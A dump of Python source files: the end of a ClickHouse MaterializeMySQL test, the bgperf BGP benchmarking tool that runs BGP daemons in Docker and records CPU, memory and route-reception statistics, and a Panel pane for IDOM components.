clickhouse_node.query("CREATE DATABASE table_test ENGINE=MaterializeMySQL('{}:3306', 'table_test', 'root', 'clickhouse')".format(service_name))
check_query(clickhouse_node, "SELECT COUNT(*) FROM table_test.table", "5\n")
mysql_node.query("DROP DATABASE table_test")
clickhouse_node.query("DROP DATABASE table_test")
|
bgperf.py
|
#!/usr/bin/env python3
#
# Copyright (C) 2015, 2016 Nippon Telegraph and Telephone Corporation.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import argparse
import os
import sys
import yaml
import time
import shutil
import netaddr
import datetime
from collections import defaultdict
from argparse import ArgumentParser, REMAINDER
from itertools import chain, islice
from requests.exceptions import ConnectionError
from pyroute2 import IPRoute
from socket import AF_INET
from nsenter import Namespace
from psutil import virtual_memory
from subprocess import check_output
import matplotlib.pyplot as plt
import numpy as np
from base import *
from exabgp import ExaBGP, ExaBGP_MRTParse
from gobgp import GoBGP, GoBGPTarget
from bird import BIRD, BIRDTarget
from frr import FRRouting, FRRoutingTarget
from frr_compiled import FRRoutingCompiled, FRRoutingCompiledTarget
from rustybgp import RustyBGP, RustyBGPTarget
from openbgp import OpenBGP, OpenBGPTarget
from tester import ExaBGPTester, BIRDTester
from mrt_tester import GoBGPMRTTester, ExaBGPMrtTester
from bgpdump2 import Bgpdump2, Bgpdump2Tester
from monitor import Monitor
from settings import dckr
from queue import Queue
from mako.template import Template
from packaging import version
from docker.types import IPAMConfig, IPAMPool
import re
def gen_mako_macro():
return '''<%
import netaddr
from itertools import islice
it = netaddr.iter_iprange('100.0.0.0','160.0.0.0')
def gen_paths(num):
return list('{0}/32'.format(ip) for ip in islice(it, num))
%>
'''
def rm_line():
#print('\x1b[1A\x1b[2K\x1b[1D\x1b[1A')
pass
def gc_thresh3():
gc_thresh3 = '/proc/sys/net/ipv4/neigh/default/gc_thresh3'
with open(gc_thresh3) as f:
return int(f.read().strip())
def doctor(args):
ver = dckr.version()['Version']
if ver.endswith('-ce'):
curr_version = version.parse(ver.replace('-ce', ''))
else:
curr_version = version.parse(ver)
min_version = version.parse('1.9.0')
ok = curr_version >= min_version
print('docker version ... {1} ({0})'.format(ver, 'ok' if ok else 'update to {} at least'.format(min_version)))
print('bgperf image', end=' ')
if img_exists('bgperf/exabgp'):
print('... ok')
else:
print('... not found. run `bgperf prepare`')
for name in ['gobgp', 'bird', 'frr', 'frr_c', 'rustybgp', 'openbgp']:
print('{0} image'.format(name), end=' ')
if img_exists('bgperf/{0}'.format(name)):
print('... ok')
else:
print('... not found. if you want to bench {0}, run `bgperf prepare`'.format(name))
print('/proc/sys/net/ipv4/neigh/default/gc_thresh3 ... {0}'.format(gc_thresh3()))
def prepare(args):
ExaBGP.build_image(args.force, nocache=args.no_cache)
ExaBGP_MRTParse.build_image(args.force, nocache=args.no_cache)
GoBGP.build_image(args.force, nocache=args.no_cache)
BIRD.build_image(args.force, nocache=args.no_cache)
FRRouting.build_image(args.force, nocache=args.no_cache)
RustyBGP.build_image(args.force, nocache=args.no_cache)
OpenBGP.build_image(args.force, nocache=args.no_cache)
#FRRoutingCompiled.build_image(args.force, nocache=args.no_cache)
# don't want to do this automatically. This one is special so have to explicitly
# update it
def update(args):
if args.image == 'all' or args.image == 'exabgp':
ExaBGP.build_image(True, checkout=args.checkout, nocache=args.no_cache)
if args.image == 'all' or args.image == 'exabgp_mrtparse':
ExaBGP_MRTParse.build_image(True, checkout=args.checkout, nocache=args.no_cache)
if args.image == 'all' or args.image == 'gobgp':
GoBGP.build_image(True, checkout=args.checkout, nocache=args.no_cache)
if args.image == 'all' or args.image == 'bird':
BIRD.build_image(True, checkout=args.checkout, nocache=args.no_cache)
if args.image == 'all' or args.image == 'frr':
FRRouting.build_image(True, checkout=args.checkout, nocache=args.no_cache)
if args.image == 'all' or args.image == 'rustybgp':
RustyBGP.build_image(True, checkout=args.checkout, nocache=args.no_cache)
if args.image == 'all' or args.image == 'openbgp':
OpenBGP.build_image(True, checkout=args.checkout, nocache=args.no_cache)
if args.image == 'frr_c':
FRRoutingCompiled.build_image(True, checkout=args.checkout, nocache=args.no_cache)
if args.image == 'bgpdump2':
Bgpdump2.build_image(True, checkout=args.checkout, nocache=args.no_cache)
def remove_target_containers():
for target_class in [BIRDTarget, GoBGPTarget, FRRoutingTarget, FRRoutingCompiledTarget, RustyBGPTarget, OpenBGPTarget]:
if ctn_exists(target_class.CONTAINER_NAME):
print('removing target container', target_class.CONTAINER_NAME)
dckr.remove_container(target_class.CONTAINER_NAME, force=True)
def remove_old_containers():
if ctn_exists(Monitor.CONTAINER_NAME):
print('removing monitor container', Monitor.CONTAINER_NAME)
dckr.remove_container(Monitor.CONTAINER_NAME, force=True)
for ctn_name in get_ctn_names():
if ctn_name.startswith(ExaBGPTester.CONTAINER_NAME_PREFIX) or \
ctn_name.startswith(ExaBGPMrtTester.CONTAINER_NAME_PREFIX) or \
ctn_name.startswith(GoBGPMRTTester.CONTAINER_NAME_PREFIX) or \
ctn_name.startswith(Bgpdump2Tester.CONTAINER_NAME_PREFIX) or \
ctn_name.startswith(BIRDTester.CONTAINER_NAME_PREFIX):
print('removing tester container', ctn_name)
dckr.remove_container(ctn_name, force=True)
def controller_idle_percent(queue):
'''collect stats on the whole machine that is running the tests'''
stop_monitoring = False
def stats():
output = {}
output['who'] = 'controller'
while True:
if stop_monitoring == True:
return
utilization = check_output(['mpstat', '1' ,'1']).decode('utf-8').split('\n')[3]
g = re.match(r'.*all\s+.*\d+\s+(\d+\.\d+)', utilization).groups()
output['idle'] = float(g[0])
output['time'] = datetime.datetime.now()
queue.put(output)
# dont' sleep because mpstat is already taking 1 second to run
t = Thread(target=stats)
t.daemon = True
t.start()
def controller_memory_free(queue):
'''collect stats on the whole machine that is running the tests'''
stop_monitoring = False
def stats():
output = {}
output['who'] = 'controller'
while True:
if stop_monitoring == True:
return
free = check_output(['free', '-m']).decode('utf-8').split('\n')[1]
g = re.match(r'.*\d+\s+(\d+)', free).groups()
output['free'] = float(g[0]) * 1024 * 1024
output['time'] = datetime.datetime.now()
queue.put(output)
time.sleep(1)
t = Thread(target=stats)
t.daemon = True
t.start()
stop_monitoring = False
def bench(args):
output_stats = {}
config_dir = '{0}/{1}'.format(args.dir, args.bench_name)
dckr_net_name = args.docker_network_name or args.bench_name + '-br'
remove_target_containers()
if not args.repeat:
remove_old_containers()
if os.path.exists(config_dir):
shutil.rmtree(config_dir)
bench_start = time.time()
if args.file:
with open(args.file) as f:
conf = yaml.safe_load(Template(f.read()).render())
else:
conf = gen_conf(args)
if not os.path.exists(config_dir):
os.makedirs(config_dir)
with open('{0}/scenario.yaml'.format(config_dir), 'w') as f:
f.write(conf)
conf = yaml.safe_load(Template(conf).render())
bridge_found = False
for network in dckr.networks(names=[dckr_net_name]):
if network['Name'] == dckr_net_name:
print('Docker network "{}" already exists'.format(dckr_net_name))
bridge_found = True
break
if not bridge_found:
subnet = conf['local_prefix']
print('creating Docker network "{}" with subnet {}'.format(dckr_net_name, subnet))
ipam = IPAMConfig(pool_configs=[IPAMPool(subnet=subnet)])
network = dckr.create_network(dckr_net_name, driver='bridge', ipam=ipam)
num_tester = sum(len(t.get('neighbors', [])) for t in conf.get('testers', []))
if num_tester > gc_thresh3():
print('gc_thresh3({0}) is lower than the number of peer({1})'.format(gc_thresh3(), num_tester))
print('type next to increase the value')
print('$ echo 16384 | sudo tee /proc/sys/net/ipv4/neigh/default/gc_thresh3')
print('run monitor')
m = Monitor(config_dir+'/monitor', conf['monitor'])
m.run(conf, dckr_net_name)
## I'd prefer to start up the testers and then start up the target
# however, bgpdump2 isn't smart enough to wait and rety connections so
# this is the order
testers = []
if not args.repeat:
valid_indexes = None
asns = None
for idx, tester in enumerate(conf['testers']):
if 'name' not in tester:
name = 'tester{0}'.format(idx)
else:
name = tester['name']
if 'type' not in tester:
tester_type = 'normal'
else:
tester_type = tester['type']
if tester_type == 'normal':
tester_class = ExaBGPTester
elif tester_type == 'bird':
tester_class = BIRDTester
elif tester_type == 'mrt':
if 'mrt_injector' not in tester:
mrt_injector = 'gobgp'
else:
mrt_injector = tester['mrt_injector']
if mrt_injector == 'gobgp':
tester_class = GoBGPMRTTester
elif mrt_injector == 'exabgp':
tester_class = ExaBGPMrtTester
elif mrt_injector == 'bgpdump2':
tester_class = Bgpdump2Tester
else:
print('invalid mrt_injector:', mrt_injector)
sys.exit(1)
else:
print('invalid tester type:', tester_type)
sys.exit(1)
t = tester_class(name, config_dir+'/'+name, tester)
print('run tester', name, 'type', tester_type)
t.run(conf['target'], dckr_net_name)
testers.append(t)
# have to do some extra stuff with bgpdump2
# because it's sending real data, we need to figure out
# wich neighbor has data and what the actual ASN is
if tester_type == 'mrt' and mrt_injector == 'bgpdump2' and not valid_indexes:
print("finding asns and such from mrt file")
valid_indexes = t.get_index_valid(args.prefix_num)
asns = t.get_index_asns()
for test in conf['testers']:
test['bgpdump-index'] = valid_indexes[test['mrt-index'] % len(valid_indexes)]
neighbor = next(iter(test['neighbors'].values()))
neighbor['as'] = asns[test['bgpdump-index']]
# TODO: this needs to all be moved to it's own object and file
# so this stuff isn't copied around
str_conf = gen_mako_macro() + yaml.dump(conf, default_flow_style=False)
with open('{0}/scenario.yaml'.format(config_dir), 'w') as f:
f.write(str_conf)
is_remote = True if 'remote' in conf['target'] and conf['target']['remote'] else False
if is_remote:
print('target is remote ({})'.format(conf['target']['local-address']))
ip = IPRoute()
# r: route to the target
r = ip.get_routes(dst=conf['target']['local-address'], family=AF_INET)
if len(r) == 0:
print('no route to remote target {0}'.format(conf['target']['local-address']))
sys.exit(1)
# intf: interface used to reach the target
idx = [t[1] for t in r[0]['attrs'] if t[0] == 'RTA_OIF'][0]
intf = ip.get_links(idx)[0]
intf_name = intf.get_attr('IFLA_IFNAME')
# raw_bridge_name: Linux bridge name of the Docker bridge
# TODO: not sure if the linux bridge name is always given by
# "br-<first 12 characters of Docker network ID>".
raw_bridge_name = args.bridge_name or 'br-{}'.format(network['Id'][0:12])
# raw_bridges: list of Linux bridges that match raw_bridge_name
raw_bridges = ip.link_lookup(ifname=raw_bridge_name)
if len(raw_bridges) == 0:
if not args.bridge_name:
print(('can\'t determine the Linux bridge interface name starting '
'from the Docker network {}'.format(dckr_net_name)))
else:
print(('the Linux bridge name provided ({}) seems nonexistent'.format(
raw_bridge_name)))
print(('Since the target is remote, the host interface used to '
'reach the target ({}) must be part of the Linux bridge '
'used by the Docker network {}, but without the correct Linux '
'bridge name it\'s impossible to verify if that\'s true'.format(
intf_name, dckr_net_name)))
if not args.bridge_name:
print(('Please supply the Linux bridge name corresponding to the '
'Docker network {} using the --bridge-name argument.'.format(
dckr_net_name)))
sys.exit(1)
# intf_bridge: bridge interface that intf is already member of
intf_bridge = intf.get_attr('IFLA_MASTER')
# if intf is not member of the bridge, add it
if intf_bridge not in raw_bridges:
if intf_bridge is None:
print(('Since the target is remote, the host interface used to '
'reach the target ({}) must be part of the Linux bridge '
'used by the Docker network {}'.format(
intf_name, dckr_net_name)))
sys.stdout.write('Do you confirm to add the interface {} '
'to the bridge {}? [yes/NO] '.format(
intf_name, raw_bridge_name
))
try:
answer = input()
except:
print('aborting')
sys.exit(1)
answer = answer.strip()
if answer.lower() != 'yes':
print('aborting')
sys.exit(1)
print('adding interface {} to the bridge {}'.format(
intf_name, raw_bridge_name
))
br = raw_bridges[0]
try:
ip.link('set', index=idx, master=br)
except Exception as e:
print(('Something went wrong: {}'.format(str(e))))
print(('Please consider running the following command to '
'add the {iface} interface to the {br} bridge:\n'
' sudo brctl addif {br} {iface}'.format(
iface=intf_name, br=raw_bridge_name)))
print('\n\n\n')
raise
else:
curr_bridge_name = ip.get_links(intf_bridge)[0].get_attr('IFLA_IFNAME')
print(('the interface used to reach the target ({}) '
'is already member of the bridge {}, which is not '
'the one used in this configuration'.format(
intf_name, curr_bridge_name)))
print(('Please consider running the following command to '
'remove the {iface} interface from the {br} bridge:\n'
' sudo brctl addif {br} {iface}'.format(
iface=intf_name, br=curr_bridge_name)))
sys.exit(1)
else:
if args.target == 'gobgp':
target_class = GoBGPTarget
elif args.target == 'bird':
target_class = BIRDTarget
elif args.target == 'frr':
target_class = FRRoutingTarget
elif args.target == 'frr_c':
target_class = FRRoutingCompiledTarget
elif args.target == 'rustybgp':
target_class = RustyBGPTarget
elif args.target == 'openbgp':
target_class = OpenBGPTarget
else:
print(f"incorrect target {args.target}")
print('run', args.target)
if args.image:
target = target_class('{0}/{1}'.format(config_dir, args.target), conf['target'], image=args.image)
else:
target = target_class('{0}/{1}'.format(config_dir, args.target), conf['target'])
target.run(conf, dckr_net_name)
time.sleep(1)
output_stats['monitor_wait_time'] = m.wait_established(conf['target']['local-address'])
output_stats['cores'], output_stats['memory'] = get_hardware_info()
start = datetime.datetime.now()
q = Queue()
m.stats(q)
controller_idle_percent(q)
controller_memory_free(q)
if not is_remote:
target.stats(q)
target.neighbor_stats(q)
# want to launch all the neighbors at the same(ish) time
# launch them after the test starts because as soon as they start they can send info at lest for mrt
# does it need to be in a different place for mrt than exabgp?
for i in range(len(testers)):
testers[i].launch()
if i > 0:
rm_line()
print(f"launched {i+1} testers")
if args.prefix_num >= 100_000:
time.sleep(1)
f = open(args.output, 'w') if args.output else None
cpu = 0
mem = 0
output_stats['max_cpu'] = 0
output_stats['max_mem'] = 0
output_stats['first_received_time'] = 0
output_stats['min_idle'] = 100
output_stats['min_free'] = 1_000_000_000_000_000
neighbors_checked = 0
percent_idle = 0
mem_free = 0
recved_checkpoint = False
neighbors_checkpoint = False
while True:
info = q.get()
if not is_remote and info['who'] == target.name:
if 'neighbors_checked' in info:
if all(value == True for value in info['neighbors_checked'].values()):
neighbors_checked = sum(1 if value == True else 0 for value in info['neighbors_checked'].values())
neighbors_checkpoint = True
else:
neighbors_checked = sum(1 if value == True else 0 for value in info['neighbors_checked'].values())
else:
cpu = info['cpu']
mem = info['mem']
output_stats['max_cpu'] = cpu if cpu > output_stats['max_cpu'] else output_stats['max_cpu']
output_stats['max_mem'] = mem if mem > output_stats['max_mem'] else output_stats['max_mem']
if info['who'] == 'controller':
if 'free' in info:
mem_free = info['free']
output_stats['min_free'] = mem_free if mem_free < output_stats['min_free'] else output_stats['min_free']
elif 'idle' in info:
percent_idle = info['idle']
output_stats['min_idle'] = percent_idle if percent_idle < output_stats['min_idle'] else output_stats['min_idle']
if info['who'] == m.name:
elapsed = info['time'] - start
output_stats['elapsed'] = elapsed
recved = info['afi_safis'][0]['state']['accepted'] if 'accepted' in info['afi_safis'][0]['state'] else 0
if elapsed.seconds > 0:
rm_line()
print('elapsed: {0}sec, cpu: {1:>4.2f}%, mem: {2}, mon recved: {3}, neighbors: {4}, %idle {5}, free mem {6}'.format(elapsed.seconds, cpu, mem_human(mem), recved, neighbors_checked, percent_idle, mem_human(mem_free)))
f.write('{0}, {1}, {2}, {3}\n'.format(elapsed.seconds, cpu, mem, recved)) if f else None
f.flush() if f else None
if recved > 0 and output_stats['first_received_time'] == 0:
output_stats['first_received_time'] = elapsed
if recved_checkpoint and neighbors_checkpoint:
output_stats['recved']= recved
f.close() if f else None
return finish_bench(args, output_stats, bench_start,target, m)
if info['checked']:
recved_checkpoint = True
def finish_bench(args, output_stats, bench_start,target, m):
bench_stop = time.time()
output_stats['total_time'] = bench_stop - bench_start
m.stop_monitoring = True
target.stop_monitoring = True
stop_monitoring = True
target_version = target.exec_version_cmd()
print_final_stats(args, target_version, output_stats)
o_s = create_output_stats(args, target_version, output_stats)
print(stats_header())
print(','.join(map(str, o_s)))
print()
# it would be better to clean things up, but often I want to to investigate where things ended up
# remove_old_containers()
# remove_target_containers()
return o_s
def print_final_stats(args, target_version, stats):
print(f"{args.target}: {target_version}")
print(f"Max cpu: {stats['max_cpu']:4.2f}, max mem: {mem_human(stats['max_mem'])}")
print(f"Min %idle {stats['min_idle']}, Min mem free {mem_human(stats['min_free'])}")
print(f"Time since first received prefix: {stats['elapsed'].seconds - stats['first_received_time'].seconds}")
print(f"total time: {stats['total_time']:.2f}s")
print()
def stats_header():
return("name, target, version, peers, prefixes per peer, received, monitor (s), elapsed (s), prefix received (s), testers (s), total time, max cpu %, max mem (GB), min idle%, min free mem (GB), flags, date,cores,Mem (GB)")
def create_output_stats(args, target_version, stats):
e = stats['elapsed'].seconds
f = stats['first_received_time'].seconds
d = datetime.date.today().strftime("%Y-%m-%d")
if 'label' in args and args.label:
name = args.label
else:
name = args.target
out = [name, args.target, target_version, str(args.neighbor_num), str(args.prefix_num)]
out.extend([stats['recved']])
out.extend([stats['monitor_wait_time'], e, f , e-f, float(format(stats['total_time'], ".2f"))])
out.extend([round(stats['max_cpu']), float(format(stats['max_mem']/1024/1024/1024, ".3f"))])
out.extend ([round(stats['min_idle']), float(format(stats['min_free']/1024/1024/1024, ".3f"))])
out.extend(['-s' if args.single_table else '', d, str(stats['cores']), mem_human(stats['memory'])])
return out
def create_graph(stats, test_name='total time', stat_index=8, test_file='total_time.png', ylabel='seconds'):
labels = {}
data = defaultdict(list)
for stat in stats:
labels[stat[0]] = True
data[f"{stat[3]}n_{stat[4]}p"].append(float(stat[stat_index]))
x = np.arange(len(labels))
bars = len(data)
width = 0.7 / bars
plt.figure()
for i, d in enumerate(data):
plt.bar(x -0.2+i*width, data[d], width=width, label=d)
plt.ylabel(ylabel)
#plt.xlabel('neighbors_prefixes')
plt.title(test_name)
plt.xticks(x,labels.keys())
plt.legend()
plt.show()
plt.savefig(test_file)
def batch(args):
""" runs several tests together, produces all the stats together and creates graphs
requires a yaml file to describe the batch of tests to run
it iterates through a list of targets, number of neighbors and number of prefixes
other variables can be set, but not iterated through
"""
with open(args.batch_config, 'r') as f:
batch_config = yaml.safe_load(f)
for test in batch_config['tests']:
results = []
for n in test['neighbors']:
for p in test['prefixes']:
for t in test['targets']:
a = argparse.Namespace(**vars(args))
a.func = bench
a.image = None
a.output = None
a.target = t['name']
a.prefix_num = p
a.neighbor_num = n
# read any config attribute that was specified in the yaml batch file
a.local_address_prefix = t['local_address_prefix'] if 'local_address_prefix' in t else '10.10.0.0/16'
for field in ['single_table', 'docker_network_name', 'repeat', 'file', 'target_local_address',
'label', 'target_local_address', 'monitor_local_address', 'target_router_id',
'monitor_router_id', 'target_config_file', 'filter_type','mrt_injector', 'mrt_file']:
setattr(a, field, t[field]) if field in t else setattr(a, field, None)
for field in ['as_path_list_num', 'prefix_list_num', 'community_list_num', 'ext_community_list_num']:
setattr(a, field, t[field]) if field in t else setattr(a, field, 0)
results.append(bench(a))
# update this each time in case something crashes
with open(f"{test['name']}.csv", 'w') as f:
f.write(stats_header() + '\n')
for stat in results:
f.write(','.join(map(str, stat)) + '\n')
print()
print(stats_header())
for stat in results:
print(','.join(map(str, stat)))
create_batch_graphs(results, test['name'])
def create_batch_graphs(results, name):
create_graph(results, test_name='total time', stat_index=10, test_file=f"bgperf_{name}_total_time.png")
create_graph(results, test_name='elapsed', stat_index=7, test_file=f"bgperf_{name}_elapsed.png")
create_graph(results, test_name='neighbor', stat_index=6, test_file=f"bgperf_{name}_neighbor.png")
create_graph(results, test_name='route reception', stat_index=9, test_file=f"bgperf_{name}_route_reception.png")
create_graph(results, test_name='max cpu', stat_index=11, test_file=f"bgperf_{name}_max_cpu.png", ylabel="%")
create_graph(results, test_name='max mem', stat_index=12, test_file=f"bgperf_{name}_max_mem.png", ylabel="GB")
def mem_human(v):
if v > 1024 * 1024 * 1024:
return '{0:.2f}GB'.format(float(v) / (1024 * 1024 * 1024))
elif v > 1024 * 1024:
return '{0:.2f}MB'.format(float(v) / (1024 * 1024))
elif v > 1024:
return '{0:.2f}KB'.format(float(v) / 1024)
else:
return '{0:.2f}B'.format(float(v))
def get_hardware_info():
cores = os.cpu_count()
mem = virtual_memory().total
return cores, mem
def gen_conf(args):
''' This creates the scenario.yml that other things need to read to produce device config
'''
neighbor_num = args.neighbor_num
prefix = args.prefix_num
as_path_list = args.as_path_list_num
prefix_list = args.prefix_list_num
community_list = args.community_list_num
ext_community_list = args.ext_community_list_num
mrt_injector = args.mrt_injector
local_address_prefix = netaddr.IPNetwork(args.local_address_prefix)
if args.target_local_address:
target_local_address = netaddr.IPAddress(args.target_local_address)
else:
target_local_address = local_address_prefix.broadcast - 1
if args.monitor_local_address:
monitor_local_address = netaddr.IPAddress(args.monitor_local_address)
else:
monitor_local_address = local_address_prefix.ip + 2
if args.target_router_id:
target_router_id = netaddr.IPAddress(args.target_router_id)
else:
target_router_id = target_local_address
if args.monitor_router_id:
monitor_router_id = netaddr.IPAddress(args.monitor_router_id)
else:
monitor_router_id = monitor_local_address
conf = {}
conf['local_prefix'] = str(local_address_prefix)
conf['target'] = {
'as': 1000,
'router-id': str(target_router_id),
'local-address': str(target_local_address),
'single-table': args.single_table,
}
if args.target_config_file:
conf['target']['config_path'] = args.target_config_file
conf['monitor'] = {
'as': 1001,
'router-id': str(monitor_router_id),
'local-address': str(monitor_local_address),
'check-points': [prefix * neighbor_num],
}
if args.mrt_injector:
conf['monitor']['check-points'] = [prefix]
if args.mrt_injector == 'gobgp': #gobgp doesn't send everything with mrt
conf['monitor']['check-points'][0] = int(conf['monitor']['check-points'][0] * 0.93)
elif args.target == 'bird': # bird seems to reject severalhandfuls of routes
conf['monitor']['check-points'][0] = int(conf['monitor']['check-points'][0] * 0.99)
it = netaddr.iter_iprange('90.0.0.0', '100.0.0.0')
conf['policy'] = {}
assignment = []
if prefix_list > 0:
name = 'p1'
conf['policy'][name] = {
'match': [{
'type': 'prefix',
'value': list('{0}/32'.format(ip) for ip in islice(it, prefix_list)),
}],
}
assignment.append(name)
if as_path_list > 0:
name = 'p2'
conf['policy'][name] = {
'match': [{
'type': 'as-path',
'value': list(range(10000, 10000 + as_path_list)),
}],
}
assignment.append(name)
if community_list > 0:
name = 'p3'
conf['policy'][name] = {
'match': [{
'type': 'community',
'value': list('{0}:{1}'.format(int(i/(1<<16)), i%(1<<16)) for i in range(community_list)),
}],
}
assignment.append(name)
if ext_community_list > 0:
name = 'p4'
conf['policy'][name] = {
'match': [{
'type': 'ext-community',
'value': list('rt:{0}:{1}'.format(int(i/(1<<16)), i%(1<<16)) for i in range(ext_community_list)),
}],
}
assignment.append(name)
neighbors = {}
configured_neighbors_cnt = 0
for i in range(3, neighbor_num+3+2):
if configured_neighbors_cnt == neighbor_num:
break
curr_ip = local_address_prefix.ip + i
if curr_ip in [target_local_address, monitor_local_address]:
print(('skipping tester\'s neighbor with IP {} because it collides with target or monitor'.format(curr_ip)))
continue
router_id = str(local_address_prefix.ip + i)
neighbors[router_id] = {
'as': 1000 + i,
'router-id': router_id,
'local-address': router_id,
'paths': '${{gen_paths({0})}}'.format(prefix),
'count': prefix,
'check-points': prefix,
'filter': {
args.filter_type: assignment,
},
}
configured_neighbors_cnt += 1
if not mrt_injector:
conf['testers'] = [{
'name': 'tester',
'type': 'bird',
'neighbors': neighbors,
}]
else:
conf['testers'] = neighbor_num*[None]
mrt_file = args.mrt_file
if not mrt_file:
print("Need to provide an mrtfile to send")
exit(1)
for i in range(neighbor_num):
router_id = str(local_address_prefix.ip + i+3)
conf['testers'][i] = {
'name': f'mrt-injector{i}',
'type': 'mrt',
'mrt_injector': mrt_injector,
'mrt-index': i,
'neighbors': {
router_id: {
'as': 1000+i+3,
'local-address': router_id,
'router-id': router_id,
'mrt-file': mrt_file,
'only-best': True,
'count': prefix,
'check-points': int(conf['monitor']['check-points'][0])
}
}
}
yaml.Dumper.ignore_aliases = lambda *args : True
return gen_mako_macro() + yaml.dump(conf, default_flow_style=False)
def config(args):
conf = gen_conf(args)
with open(args.output, 'w') as f:
f.write(conf)
def create_args_parser(main=True):
parser = ArgumentParser(description='BGP performance measuring tool')
parser.add_argument('-b', '--bench-name', default='bgperf')
parser.add_argument('-d', '--dir', default='/tmp')
s = parser.add_subparsers()
parser_doctor = s.add_parser('doctor', help='check env')
parser_doctor.set_defaults(func=doctor)
parser_prepare = s.add_parser('prepare', help='prepare env')
parser_prepare.add_argument('-f', '--force', action='store_true', help='build even if the container already exists')
parser_prepare.add_argument('-n', '--no-cache', action='store_true')
parser_prepare.set_defaults(func=prepare)
parser_update = s.add_parser('update', help='rebuild bgp docker images')
parser_update.add_argument('image', choices=['exabgp', 'exabgp_mrtparse', 'gobgp', 'bird', 'frr', 'frr_c',
'rustybgp', 'openbgp', 'bgpdump2', 'all'])
parser_update.add_argument('-c', '--checkout', default='HEAD')
parser_update.add_argument('-n', '--no-cache', action='store_true')
parser_update.set_defaults(func=update)
def add_gen_conf_args(parser):
parser.add_argument('-n', '--neighbor-num', default=100, type=int)
parser.add_argument('-p', '--prefix-num', default=100, type=int)
parser.add_argument('-l', '--filter-type', choices=['in', 'out'], default='in')
parser.add_argument('-a', '--as-path-list-num', default=0, type=int)
parser.add_argument('-e', '--prefix-list-num', default=0, type=int)
parser.add_argument('-c', '--community-list-num', default=0, type=int)
parser.add_argument('-x', '--ext-community-list-num', default=0, type=int)
parser.add_argument('-s', '--single-table', action='store_true')
parser.add_argument('-m', '--mrt_injector', choices=[None, 'gobgp', 'bgpdump2'], default=None)
parser.add_argument('--mrt-file', type=str,
help='mrt file, requires absolute path')
parser.add_argument('--target-config-file', type=str,
help='target BGP daemon\'s configuration file')
parser.add_argument('--local-address-prefix', type=str, default='10.10.0.0/16',
help='IPv4 prefix used for local addresses; default: 10.10.0.0/16')
parser.add_argument('--target-local-address', type=str,
help='IPv4 address of the target; default: the last address of the '
'local prefix given in --local-address-prefix')
parser.add_argument('--target-router-id', type=str,
help='target\' router ID; default: same as --target-local-address')
parser.add_argument('--monitor-local-address', type=str,
help='IPv4 address of the monitor; default: the second address of the '
'local prefix given in --local-address-prefix')
parser.add_argument('--monitor-router-id', type=str,
help='monitor\' router ID; default: same as --monitor-local-address')
parser_bench = s.add_parser('bench', help='run benchmarks')
parser_bench.add_argument('-t', '--target', choices=['gobgp', 'bird', 'frr', 'frr_c', 'rustybgp', 'openbgp'], default='gobgp')
parser_bench.add_argument('-i', '--image', help='specify custom docker image')
parser_bench.add_argument('--docker-network-name', help='Docker network name; this is the name given by \'docker network ls\'')
parser_bench.add_argument('--bridge-name', help='Linux bridge name of the '
'interface corresponding to the Docker network; '
'use this argument only if bgperf can\'t '
'determine the Linux bridge name starting from '
'the Docker network name in case of tests of '
'remote targets.')
parser_bench.add_argument('-r', '--repeat', action='store_true', help='use existing tester/monitor container')
parser_bench.add_argument('-f', '--file', metavar='CONFIG_FILE')
parser_bench.add_argument('-o', '--output', metavar='STAT_FILE')
add_gen_conf_args(parser_bench)
parser_bench.set_defaults(func=bench)
parser_config = s.add_parser('config', help='generate config')
parser_config.add_argument('-o', '--output', default='bgperf.yml', type=str)
add_gen_conf_args(parser_config)
parser_config.set_defaults(func=config)
parser_batch = s.add_parser('batch', help='run batch benchmarks')
parser_batch.add_argument('-c', '--batch_config', type=str, help='batch config file')
parser_batch.set_defaults(func=batch)
return parser
if __name__ == '__main__':
parser = create_args_parser()
args = parser.parse_args()
try:
func = args.func
except AttributeError:
parser.error("too few arguments")
args.func(args)
|
idom.py
|
import sys
import asyncio
from functools import partial
from threading import Thread
from queue import Queue as SyncQueue
from packaging.version import Version
from ..io.notebook import push_on_root
from ..io.resources import DIST_DIR, LOCAL_DIST
from ..io.state import state
from ..models import IDOM as _BkIDOM
from .base import PaneBase
_IDOM_MIN_VER = "0.23"
_IDOM_MAX_VER = "0.24"
def _spawn_threaded_event_loop(coro):
loop_q = SyncQueue()
def run_in_thread():
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
loop_q.put(loop)
loop.run_until_complete(coro)
thread = Thread(target=run_in_thread, daemon=True)
thread.start()
return loop_q.get()
class IDOM(PaneBase):
priority = None
_updates = True
_unpack = True
_bokeh_model = _BkIDOM
def __init__(self, object=None, **params):
from idom import __version__ as idom_version
if Version(_IDOM_MIN_VER) > Version(idom_version) >= Version(_IDOM_MAX_VER):
raise RuntimeError(
f"Expected idom>={_IDOM_MIN_VER},<{_IDOM_MAX_VER}, but found {idom_version}"
)
super().__init__(object, **params)
self._idom_loop = None
self._idom_model = {}
self.param.watch(self._update_layout, 'object')
def _update_layout(self, *args):
self._idom_model = {}
if self._idom_loop is None:
return
self._setup()
def _setup(self):
if self.object is None:
return
from idom.core.component import Component
from idom.core.layout import Layout
if isinstance(self.object, Layout):
self._idom_layout = self.object
elif isinstance(self.object, Component):
self._idom_layout = Layout(self.object)
else:
self._idom_layout = Layout(self.object())
self._idom_loop = _spawn_threaded_event_loop(self._idom_layout_render_loop())
def _get_model(self, doc, root=None, parent=None, comm=None):
from idom.core.layout import LayoutUpdate
from idom.config import IDOM_CLIENT_IMPORT_SOURCE_URL
# let the client determine import source location
IDOM_CLIENT_IMPORT_SOURCE_URL.set("./")
if comm:
url = '/panel_dist/idom'
else:
url = '/'+LOCAL_DIST+'idom'
if self._idom_loop is None:
self._setup()
update = LayoutUpdate.create_from({}, self._idom_model)
props = self._init_params()
model = self._bokeh_model(
event=[update.path, update.changes], importSourceUrl=url, **props
)
if root is None:
root = model
self._link_props(model, ['msg'], doc, root, comm)
if root is None:
root = model
self._models[root.ref['id']] = (model, parent)
return model
def _cleanup(self, root):
super()._cleanup(root)
if not self._models:
# Clean up loop when no views are shown
try:
self._idom_loop.stop()
finally:
self._idom_loop = None
self._idom_layout = None
def _process_property_change(self, msg):
if msg['msg'] is None:
return {}
